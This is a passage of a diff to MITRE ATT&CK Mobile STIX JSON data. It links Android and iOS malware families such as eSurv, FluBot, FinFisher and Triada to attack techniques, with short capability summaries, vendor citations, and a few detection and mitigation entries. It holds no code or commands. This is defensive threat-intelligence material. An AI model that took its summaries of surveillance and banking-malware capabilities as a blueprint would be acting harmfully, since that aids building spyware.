+ { + "source_name": "Lookout eSurv", + "url": "https://blog.lookout.com/esurv-research", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020." 
+ } + ], + "modified": "2020-09-14T15:39:17.961Z", + "description": "[eSurv](https://attack.mitre.org/software/S0507)’s Android version is distributed in three stages: the dropper, the second stage payload, and the third stage payload which is [Exodus](https://attack.mitre.org/software/S0405).(Citation: Lookout eSurv)", + "relationship_type": "uses", + "source_ref": "malware--680f680c-eef9-4f8a-b5f5-f451bf47e403", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--e0f58ab7-b246-4c41-9afc-89b582590809", + "type": "relationship", + "created": "2020-12-18T20:14:47.374Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. Retrieved December 18, 2020." 
+ } + ], + "modified": "2020-12-18T20:14:47.374Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) can download additional modules at runtime via JavaScript `eval` statements.(Citation: WhiteOps TERRACOTTA)", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--7ba30703-c3aa-425a-9482-9e9941fd7038", + "type": "relationship", + "created": "2020-12-24T21:45:56.961Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2020-12-24T21:45:56.961Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) can access the camera on the device.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--d8940e76-f9c1-4912-bea6-e21c251370b6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--006b3910-e9c3-4de8-ba49-dff36b1a3308", + "created": "2023-02-06T19:04:33.224Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:06:11.934Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can monitor notifications.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9caf7cd5-fa15-45f0-8e1e-75917ea33af2", + "created": "2023-03-20T18:50:32.580Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:50:32.580Z", + "description": "", + "relationship_type": "detects", + 
"source_ref": "x-mitre-data-component--b1e0bb80-23d4-44f2-b919-7e9c54898f43", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ffc24804-42db-4be1-a418-7f5ab9de453c", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout-NotCompatible", + "description": "Tim Strazzere. (2014, November 19). The new NotCompatible: Sophisticated and evasive threat harbors the potential to compromise enterprise networks. Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/11/19/notcompatible/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[NotCompatible](https://attack.mitre.org/software/S0299) has the capability to exploit systems on an enterprise network.(Citation: Lookout-NotCompatible)", + "relationship_type": "uses", + "source_ref": "malware--23040c15-e7d8-47b5-8c16-8fd3e0e297fe", + "target_ref": "attack-pattern--22379609-a99f-4a01-bd7e-70f3e105859d", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e7b33eb5-6c2e-4743-ac8d-c27d5e7121ac", + "created": "2020-06-26T15:32:25.060Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Threat Fabric Cerberus", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. 
Retrieved June 26, 2020.", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:35:13.005Z", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) can uninstall itself from a device on command.(Citation: Threat Fabric Cerberus)", + "relationship_type": "uses", + "source_ref": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "target_ref": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e889782a-f66b-448e-a466-e55b1bce7b64", + "created": "2023-02-28T20:38:25.598Z", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. 
Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-28T20:38:25.598Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) has encrypted C2 message bodies with RSA and encoded them in base64.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--16d73b64-5681-4ea0-9af4-4ad86f7c96e8", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--481e5d33-eca4-453c-9fec-27ee01d50989", + "created": "2023-02-28T21:45:41.365Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "cloudmark_tanglebot_0921", + "description": "Felipe Naves, Andrew Conway, W. Stuart Jones, Adam McNeil . (2021, September 23). TangleBot: New Advanced SMS Malware Targets Mobile Users Across U.S. and Canada with COVID-19 Lures. 
Retrieved February 28, 2023.", + "url": "https://www.cloudmark.com/en/blog/malware/tanglebot-new-advanced-sms-malware-targets-mobile-users-across-us-and-canada-covid-19" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:26:12.006Z", + "description": "[TangleBot](https://attack.mitre.org/software/S1069) can request permission to view files and media.(Citation: cloudmark_tanglebot_0921)", + "relationship_type": "uses", + "source_ref": "malware--68156e5a-4c3a-46dd-9c5e-c0bfdec6651f", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--7a50961b-9be4-4042-a6a0-878b612c520e", + "type": "relationship", + "created": "2019-07-10T15:25:57.602Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Dark Caracal Jan 2018", + "description": "Blaich, A., et al. (2018, January 18). Dark Caracal: Cyber-espionage at a Global Scale. 
Retrieved April 11, 2018.", + "url": "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" + } + ], + "modified": "2019-08-12T17:30:07.571Z", + "description": "[FinFisher](https://attack.mitre.org/software/S0182) uses the device microphone to record phone conversations.(Citation: Lookout Dark Caracal Jan 2018)", + "relationship_type": "uses", + "source_ref": "malware--a5528622-3a8a-4633-86ce-8cdaf8423858", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b697a198-8949-43e0-b2b8-23498373c920", + "created": "2023-03-20T18:37:13.628Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:37:13.628Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--764ee29e-48d6-4934-8e6b-7a606aaaafc0", + "target_ref": "attack-pattern--c6a146ae-9c63-4606-97ff-e261e76e8380", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--2115228b-c61a-4ebb-829a-df7355635fbf", + "created": "2020-12-17T20:15:22.491Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. 
Retrieved September 9, 2019.", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:50:12.639Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can detect if the app is running on an emulator.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--6ffad4be-bfe0-424f-abde-4d9a84a800ad", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--70f8cbed-b20d-4ff2-ad02-8d78e7d49159", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "PaloAlto-Xbot", + "description": "Cong Zheng, Claud Xiao and Zhi Xu. (2016, February 18). New Android Trojan “Xbot” Phishes Credit Cards and Bank Accounts, Encrypts Devices for Ransom. 
Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "description": "[Xbot](https://attack.mitre.org/software/S0298) can encrypt the victim's files in external storage (e.g., SD card) and then request a PayPal cash card as ransom.(Citation: PaloAlto-Xbot)", + "relationship_type": "uses", + "source_ref": "tool--da21929e-40c0-443d-bdf4-6b60d15448b4", + "target_ref": "attack-pattern--d9e88203-2b5d-405f-a406-2933b1e3d7e4", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--39b854c1-5906-4d14-a0bc-1242c3eaa5b0", + "created": "2022-04-11T20:05:56.540Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-11T20:05:56.540Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--24a77e53-0751-46fc-b207-99378fb35c08", + "target_ref": "attack-pattern--fc53309d-ebd5-4573-9242-57024ebdad4f", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--4b16e681-9542-4f32-b23a-f1b0caf44b6a", + "type": "relationship", + "created": "2020-12-24T21:55:56.726Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. 
Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." + } + ], + "modified": "2020-12-24T21:55:56.726Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has downloaded additional code to root devices, such as TowelRoot.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d71fab20-a56c-4404-a65d-aaa37056f16e", + "created": "2022-04-01T15:16:16.027Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Trend Micro iOS URL Hijacking", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/ios-url-scheme-susceptible-to-hijacking/", + "description": "L. Wu, Y. Zhou, M. Li. (2019, July 12). iOS URL Scheme Susceptible to Hijacking. Retrieved September 11, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "iOS 11 introduced a first-come-first-served principle for URIs, allowing only the prior installed app to be launched via the URI.(Citation: Trend Micro iOS URL Hijacking) Android 6 introduced App Links.", + "modified": "2022-04-01T15:16:16.027Z", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--789ef15a-34d9-4b32-a779-8cbbc9eb32f5", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--1a5bde32-aaa9-42d0-ab70-c9f11b0ae81e", + "created": "2020-09-14T14:13:45.299Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Lookout eSurv", + "url": "https://blog.lookout.com/esurv-research", + "description": "A. Bauer. (2019, April 8). Lookout discovers phishing sites distributing new iOS and Android surveillanceware. Retrieved September 11, 2020." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[eSurv](https://attack.mitre.org/software/S0507)’s Android version has used public key encryption and certificate pinning for C2 communication.(Citation: Lookout eSurv)", + "modified": "2022-04-18T15:58:08.240Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--680f680c-eef9-4f8a-b5f5-f451bf47e403", + "target_ref": "attack-pattern--16d73b64-5681-4ea0-9af4-4ad86f7c96e8", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b9af8369-a6b2-4081-9f07-2ee15d56bffc", + "type": "relationship", + "created": "2020-06-02T14:32:31.871Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Project Zero Insomnia", + "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html", + "description": "I. Beer. (2019, August 29). Implant Teardown. Retrieved June 2, 2020." 
+ } + ], + "modified": "2020-06-24T18:24:35.795Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) can collect application database files, including Gmail, Hangouts, device photos, and container directories of third-party apps.(Citation: Google Project Zero Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bff3f22c-660d-4ceb-b1bb-dbd064d363c0", + "created": "2023-03-15T16:39:32.117Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-15T16:39:32.117Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--6c62144a-cd5c-401c-ada9-58c4c74cd9d2", + "target_ref": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--60ad088f-3133-4b0c-a441-e1e06fff1765", + "created": "2023-02-06T19:37:56.416Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "threatfabric_sova_0921", + "description": "ThreatFabric. (2021, September 9). S.O.V.A. - A new Android Banking trojan with fowl intentions. 
Retrieved February 6, 2023.", + "url": "https://www.threatfabric.com/blogs/sova-new-trojan-with-fowl-intentions.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-29T21:34:29.147Z", + "description": "[S.O.V.A.](https://attack.mitre.org/software/S1062) can gather data about the device.(Citation: threatfabric_sova_0921)", + "relationship_type": "uses", + "source_ref": "malware--4b53eb01-57d7-47b4-b078-22766b002b36", + "target_ref": "attack-pattern--e2ea7f6b-8d4f-49c3-819d-660530d12b77", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c6464a84-e23b-412f-b435-5b23853d3643", + "created": "2020-09-14T13:35:45.909Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "ESET-Twitoor", + "url": "http://www.welivesecurity.com/2016/08/24/first-twitter-controlled-android-botnet-discovered/", + "description": "ESET. (2016, August 24). First Twitter-controlled Android botnet discovered. Retrieved December 22, 2016." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Twitoor](https://attack.mitre.org/software/S0302) encrypts its C2 communication.(Citation: ESET-Twitoor)", + "modified": "2022-04-20T12:58:23.550Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--41e3fd01-7b83-471f-835d-d2b1dc9a770c", + "target_ref": "attack-pattern--ed2c05a1-4f81-4d97-9e1b-aff01c34ae84", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--38f96449-dfb1-49db-b0d0-f257c3ee2c5d", + "created": "2020-09-11T14:54:16.587Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Desert Scorpion", + "description": "A. Blaich, M. Flossman. (2018, April 16). Lookout finds new surveillanceware in Google Play with ties to known threat actor targeting the Middle East. 
Retrieved September 11, 2020.", + "url": "https://blog.lookout.com/desert-scorpion-google-play" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:25:21.998Z", + "description": "[Desert Scorpion](https://attack.mitre.org/software/S0505) can retrieve SMS messages.(Citation: Lookout Desert Scorpion)", + "relationship_type": "uses", + "source_ref": "malware--3271c107-92c4-442e-9506-e76d62230ee8", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6bb4de7d-1ef9-4bc8-8d34-62e176d4188a", + "created": "2023-03-03T15:42:28.475Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. 
Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:17:24.417Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can send large amounts of device data over its C2 channel, including the device’s manufacturer, model, version and serial number, telephone number, and IP address.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--9373912a-affa-4a3c-ad97-1b8311e228ee", + "type": "relationship", + "created": "2019-09-04T14:28:15.991Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. 
Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2019-09-04T14:32:12.803Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) checks if the device is connected via Wi-Fi or mobile data.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--eef8fb1f-3e8c-44d7-b0d1-1fbad81e392f", + "created": "2019-07-16T14:33:12.107Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Kaspersky Triada June 2016", + "url": "https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/", + "description": "Kivva, A. (2016, June 6). Everyone sees not what they want to see. Retrieved July 16, 2019." + }, + { + "source_name": "Google Triada June 2019", + "url": "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html", + "description": "Lukasz Siewierski. (2019, June 6). PHA Family Highlights: Triada. Retrieved July 16, 2019." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Triada](https://attack.mitre.org/software/S0424) can redirect ad banner URLs on websites visited by the user to specific ad URLs.(Citation: Google Triada June 2019)(Citation: Kaspersky Triada June 2016) ", + "modified": "2022-04-19T14:25:41.669Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--f082fc59-0317-49cf-971f-a1b6296ebb52", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f240e06c-3a5b-4a34-a69c-5fccb4c94150", + "type": "relationship", + "created": "2020-05-11T16:37:36.673Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "ThreatFabric. (2019, November). Ginp - A malware patchwork borrowing from Anubis. 
Retrieved April 8, 2020.", + "url": "https://www.threatfabric.com/blogs/ginp_a_malware_patchwork_borrowing_from_anubis.html", + "source_name": "ThreatFabric Ginp" + } + ], + "modified": "2020-05-11T16:37:36.673Z", + "description": " [Ginp](https://attack.mitre.org/software/S0423) can download device logs.(Citation: ThreatFabric Ginp) ", + "relationship_type": "uses", + "source_ref": "malware--6146be90-470c-4049-bb3a-9986b8ffb65b", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6661823b-4fdd-4879-ad5d-64c9a4b12519", + "created": "2022-04-05T17:03:53.457Z", + "x_mitre_version": "0.1", + "x_mitre_deprecated": false, + "revoked": false, + "description": "", + "modified": "2022-04-05T17:03:53.457Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--51636761-2e35-44bf-9e56-e337adf97174", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": 